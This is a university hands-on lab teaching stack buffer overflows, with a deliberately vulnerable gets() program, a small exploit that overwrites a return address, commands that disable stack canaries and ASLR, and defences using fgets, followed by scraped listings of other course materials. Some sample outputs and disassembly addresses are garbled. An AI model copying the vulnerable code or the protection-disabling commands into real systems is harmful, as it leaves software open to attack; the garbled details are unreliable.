Blossom Hands-on exercises for computer forensics and security. Buffer Overflow
Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and/or modify this document under a license compliant with the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License. To view a copy of this license, visit

Buffer Overflow

BLOSSOM
Manchester Metropolitan University
(Funded by Higher Education Academy)
l.han@mmu.ac.uk
1. Learning Objectives

This lab aims to give an understanding of buffer overflows.

2. Preparation

1) Under Linux environment
2) Some files that you will need from /home/user/blossomfiles/bufferoverflow:
   'exploit.c'
   'lame.c'
3) Some documents that you may need to refer to:
   'Virtual-MachineGuide.pdf'
   'Linux-Guide.pdf'
   'BLOSSOM-UserGuide.pdf'

3. Tasks

Setup & Installation

Start a virtual machine as you have done with previous exercises (see Virtual Machine Guide):

    # kvm -cdrom /var/tmp/blossomfiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:57 -net vde -name node-one

Use the following set of commands to compile the C files and to disable the protections against buffer overflows (-fno-stack-protector turns off GCC's stack canaries; writing 0 to randomize_va_space turns off address space layout randomisation):

    # gcc -o exploit exploit.c
    # gcc -o lame lame.c -fno-stack-protector
    # echo 0 > /proc/sys/kernel/randomize_va_space
Task 1 Buffer Overflow

1.1 Buffer overflows are probably one of the most vicious tools available to an attacker. A small honest mistake made by a programmer in a program with SETUID root permissions can mean catastrophe.

A buffer overflow is the technique of overwriting machine code with an attacker's own code; this occurs when a program written in a low-level language takes input from a user without checking its size. It can be used to gain root access.

In older languages, such as FORTRAN, C and C++, it's possible to over-address arrays. In modern languages like Java, this is not possible. When an array is passed to a function in C, the function has no concept of the bounds; it is the programmer's responsibility to check bounds. For example:

    #include <stdio.h>              //Include the standard input output library

    void somefunction(char *buf);

    void somefunction(char *buf){
        buf[17] = 'a';              //Address memory that isn't in the array
    }

    int main(void){
        char buf[16];               //Declare an array of 16 chars, same as a string
        somefunction(buf);          //Call somefunction and pass buf to it
        return 0;
    }

In the above example, we have assigned to index 17 of array buf, but the array only has 16 elements. As the data type is a char (byte), 'a' will be written to a byte in the memory that follows the array.
If memory locations are adjacent, then you can overwrite an adjacent variable by over-addressing an array. For example:

    #include <stdio.h>
    #include <string.h>

    int main(void){
        char buf[4];                //Declare an array of 4 characters
        char *b;                    //Declare a pointer to a character
        b = &buf[4];                //Make b sit at the end of buf (the first byte past the array)
        *b = 'x';                   //Make char b = x
        printf("b is %c\n", *b);    //Print b which should be x
        strcpy(buf, "hello");       //Copy "hello" into buf, which is longer than buf
        printf("b is %c\n", *b);    //Print b which should be o
        return 0;
    }

When this program is compiled and executed, the following output is given:

    B is b
    B is o
1.2 Programs are given their own virtual memory space by the operating system. This allows multiple programs to run at once, and it also means that the program doesn't have to deal with absolute memory addressing. Programs are given enough memory to hold all the instructions and variable space.

The stack is a section of memory shared by all the functions in a program; it uses a LIFO (last in, first out) format. Data is pushed on to the top of the stack, and pulled from the top. The process of calling a function is as follows:

- Push any data needed by the function on to the stack
- Jump to the location of the first instruction of the function
- Pull any data off the stack
- Run instructions
- Return to the given instruction location

We know from the previous example that it's possible to access other variables in the stack. It's also possible to write over the return address, such that it points to a different location.

In the following example, program 2 takes user input; program 1 outputs enough data to fill the buffer of program 2 and then overwrite the return address with 0x4005d1, the address of the function somefunction().

    //Program 1
    //This program exploits a buffer overflow vulnerability in program2
    //address to another function
    #include <stdio.h>

    #define ID 0x4005d1             //Address of somefunction()

    int main(void){
        char buf[(24+8)];           //setup an array of 32 chars
        int i;
        for(i = 0; i < 24; ++i)
            buf[i] = 'a';           //Fill array with 24x'a'
        *(long *) &buf[24] = ID;    //Fill remainder of array with ID
                                    //cast to long (long = 8bytes)
        puts(buf);                  //output the string
        return 0;
    }

    //Program 2
    //Insecure program, should execute somefunction, and then echo input back to user.
    #include <stdio.h>

    int i = 0;

    void somefunction(void);
    void lame(void);

    void somefunction(void){
        if(i != 0)
            printf("i haz been haked\n");
        else
            printf("working as normal\n");
        ++i;
    }

    void lame(void){
        char buf[8];
        gets(buf);                  //No bounds check: this is the vulnerability
        printf("input: %s\n", buf);
    }

    int main(void){
        somefunction();
        lame();
        return 0;
    }

When both programs are executed in the terminal as follows:

    # ./program1 | ./program2

The output should be:

    Working as normal
    Input: aaaaaaaaaaaaaaaaaaaaaaaa@
    I haz been hacked
    Input: `@

Unauthorised code has been executed: somefunction() has been called twice when it shouldn't have.

We should now have a basic understanding of how buffer overflows work. Try executing the files that we downloaded earlier; the program should return a Segmentation Fault. This means that the program is attempting to access memory that the CPU cannot physically address.
1.3 The command gdb can be used to disassemble compiled programs into their memory locations and instructions. This is essential if one is to write a program like the one above that can exploit successfully. Once you have identified an overflow vulnerability, you would need to use the following commands to obtain enough information to write a successful exploit:

    # gdb -q program2
    #Load the program progname into gdb

    (gdb) disass main
    Dump of assembler code for function main:
    0x cd <+0>: push %rbp
    0x ce <+1>: mov %rsp,%rbp
    0x d1 <+4>: callq 0x40056c <somefunction>
    0x d6 <+9>: callq 0x4005a1 <lame>
    0x db <+14>: pop %rbp
    0x dc <+15>: retq
    End of assembler dump....
    #Disassemble the function main, function 'lame' is called at instruction 0x4005d6

    (gdb) disass lame
    Dump of assembler code for function lame:
    0x a1 <+0>: push %rbp
    0x a2 <+1>: mov %rsp,%rbp
    0x a5 <+4>: sub $0x10,%rsp
    0x a9 <+8>: lea -0x10(%rbp),%rax
    0x ad <+12>: mov %rax,%rdi
    0x b0 <+15>: callq 0x <gets@plt>
    0x b5 <+20>: lea -0x10(%rbp),%rax
    0x b9 <+24>: mov %rax,%rsi
    0x bc <+27>: mov $0x4006b3,%edi
    0x c1 <+32>: mov $0x0,%eax
    0x c6 <+37>: callq 0x <printf@plt>
    0x cb <+42>: leaveq
    0x cc <+43>: retq
    End of assembler dump....
    #Disassemble function lame, total reserved stack size for variables is 0x bytes
    #8 bytes padding are always included
    #From line <+4>
    #So overflow occurs at anything over 24 bytes
With this information, it's possible to write exploits for simple programs. Writing advanced exploits goes far beyond the scope of this document.

Now that we also understand how to disassemble code and analyse the stack, let's try to actually perform a buffer overflow. Disassemble the program 'lame' using gdb and take a look at the stack. Using the knowledge gained so far from this lab, find the instruction address of a callq to a function, and then modify the file 'exploit.c' accordingly.

NOTE: Stack locations can differ between students.

We should have a similar result to that of the example earlier.

1.4 There are many ways in which buffer overflows can be defended against, such as:

Data Execution Protection
Many modern processors include a feature that forbids data to be executed as code. In more complex examples, the processor would detect that data would be trying to execute, halting the process.

Operating System
Both Windows and Linux feature software that implements Data Execution Prevention.

Sanitising Code
The safest way to avoid buffer overflow exploits is to remove the possibility of over-addressing data in the first place. It was identified a long time ago that gets was unsafe. Since then, newer and safer functions have been developed, such as fgets. The prototype for fgets is:

    char *fgets(char *s, int size, FILE *stream)

For example, to copy an amount of data equal to that of the size of buf into buf, from stdin:

    fgets(buf, sizeof(buf), stdin);

This is a safe replacement for gets.

Try to sanitise the file 'lame.c' that was downloaded initially by using fgets instead of gets, and then recompile the code and execute it, noting the difference in result.
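The fgets replacement described above, as an added example that is not part of the original lab or of the supplied 'lame.c': a bounded line reader that also strips the newline and discards the rest of an over-long line, so the surplus bytes are not picked up by the next read. The names read_line, struct frame and feed are assumptions made for this illustration, and the input strings are constructed and supplied through a temporary file instead of stdin.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 8               /* same size as buf in lame() */
#define GUARD    0xA5A5A5A5UL    /* arbitrary sentinel value (assumption) */

enum read_status { READ_OK = 0, READ_TRUNCATED = 1, READ_EOF = -1 };

/* Reads one line into buf without ever writing more than size bytes.
 * The trailing newline is removed. If the line does not fit, the first
 * size-1 characters are kept, the rest of the line is discarded and
 * READ_TRUNCATED is returned. */
static enum read_status read_line(char *buf, size_t size, FILE *in)
{
    size_t len;
    int c, dropped = 0;

    if (size == 0 || size > INT_MAX)
        return READ_EOF;
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';           /* nothing read: leave an empty string */
        return READ_EOF;
    }
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';     /* whole line fitted */
        return READ_OK;
    }
    /* No newline stored: either the input ended or the line was too long.
     * Drain up to the newline so the surplus is not read as the next line. */
    while ((c = getc(in)) != EOF && c != '\n')
        dropped = 1;
    return dropped ? READ_TRUNCATED : READ_OK;
}

/* Stand-in for the stack frame of lame(): guard represents whatever
 * sits in memory directly after the 8-byte buffer. */
struct frame {
    char buf[BUF_SIZE];
    unsigned long guard;
};

/* Feeds a constructed input string to read_line() twice through a scratch
 * file. Returns the status of the first read, copies both stored lines
 * out, and reports whether the guard value survived. */
static int feed(const char *input, char first[BUF_SIZE],
                char second[BUF_SIZE], int *guard_ok)
{
    struct frame f;
    enum read_status st;
    FILE *in = tmpfile();

    if (in == NULL)
        return -2;               /* could not create the scratch file */
    fputs(input, in);
    rewind(in);

    f.guard = GUARD;
    st = read_line(f.buf, sizeof f.buf, in);
    snprintf(first, BUF_SIZE, "%s", f.buf);
    read_line(f.buf, sizeof f.buf, in);
    snprintf(second, BUF_SIZE, "%s", f.buf);
    *guard_ok = (f.guard == GUARD);
    fclose(in);
    return st;
}

int main(void)
{
    /* Constructed input: an over-long first line, then the line "ok". */
    char first[BUF_SIZE], second[BUF_SIZE];
    int guard_ok;
    int st = feed("aaaaaaaaaaaaaaaaaaaaaaaaXYZ\nok\n",
                  first, second, &guard_ok);

    printf("status=%d first=\"%s\" second=\"%s\" guard_intact=%d\n",
           st, first, second, guard_ok);
    return 0;
}
```

With gets in place of read_line, the same over-long line would be written past the end of buf; here only seven characters and the terminator are stored and the caller is told the input was truncated.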
Summary Questions:

1. In your own words, explain:
   - Buffers
   - Buffer Overflows
2. Name a language other than Java that protects against buffer overflows.
3. In your own words, using your own research, give a famous example of a buffer overflow exploit. Include technical details.
4. Why is the function gets unsafe?
More informationvoid P() {... y = Q(x); print(y); return; } ... int Q(int t) { int v[10];... return v[t]; } Computer Systems: A Programmer s Perspective
void P() { y = Q(x); print(y); return;... int Q(int t) { int v[10]; return v[t]; Computer Systems: A Programmer s Perspective %rax %rbx 0x101 0x41 0x7FFFFA8 0x1 0x7FFFFF8 0xB5A9 0x7FFFFF0 0x789ABC 0x7FFFFE8
More informationCSE 351 Midterm - Winter 2015
CSE 351 Midterm - Winter 2015 February 09, 2015 Please read through the entire examination first! We designed this exam so that it can be completed in 50 minutes and, hopefully, this estimate will prove
More informationSoftware Security: Buffer Overflow Defenses
CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin,
More informationDay14 A. Young W. Lim Tue. Young W. Lim Day14 A Tue 1 / 15
Day14 A Young W. Lim 2017-12-26 Tue Young W. Lim Day14 A 2017-12-26 Tue 1 / 15 Outline 1 Based on 2 C Strings (1) Characters and Strings Unformatted IO Young W. Lim Day14 A 2017-12-26 Tue 2 / 15 Based
More informationIntroduction to software exploitation ISSISP 2017
Introduction to software exploitation ISSISP 2017 1 VM https://drive.google.com/open?id=0b8bzf4ybu s1kltjsnlnwqjhss1e (sha1sum: 36c32a596bbc908729ea9333f3da10918e24d767) Login / pass: issisp / issisp 2
More informationA short session with gdb verifies a few facts; the student has made notes of some observations:
This assignment refers to concepts discussed in the course notes on gdb and the book The Art of Debugging by Matloff & Salzman. The questions are definitely "hands-on" and will require some reading beyond
More informationLinux Memory Layout The course that gives CMU its Zip! Machine-Level Programming IV: Miscellaneous Topics Sept. 24, Text & Stack Example
Machine-Level Programming IV: Miscellaneous Topics Sept. 24, 22 class09.ppt 15-213 The course that gives CMU its Zip! Topics Linux Memory Layout Understanding Pointers Buffer Overflow Floating Point Code
More informationBuffer Overflow and Protection Technology. Department of Computer Science,
Buffer Overflow and Protection Technology Department of Computer Science, Lorenzo Cavallaro Andrea Lanzi Table of Contents Introduction
More informationidkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.
idkwim@gmail.com idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com choicy90@nate.com (Nate-On) @idkwim idkwim.linknow.kr Zombie PC?? -> No! Return Oriented Programming
More information